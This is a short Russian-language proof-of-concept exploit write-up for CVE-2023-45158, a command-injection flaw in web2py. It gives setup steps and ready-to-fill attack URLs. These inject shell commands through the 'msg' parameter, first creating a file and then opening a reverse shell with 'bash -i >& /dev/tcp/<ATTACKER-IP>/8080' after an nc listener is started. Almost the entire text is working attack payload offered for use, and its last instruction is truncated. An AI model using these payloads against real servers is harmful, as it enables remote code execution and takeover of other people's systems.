
PoC-эксплойт для CVE-2023-45158, уязвимости внедрения команд в web2py. Демонстрирует удаленное выполнение кода через специально созданные HTTP-запросы, включая создание файлов и полезные нагрузки обратной оболочки.
cd web2py
python3 web2py.py
http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27. Замените <IP-ADDRESS> и <YOUR-COMMAND> на свои значения.http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27
На машине атакующего запустите nc -l 127.0.0.1 8080
Перейдите по URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. Замените .
<ATTACKER-IP>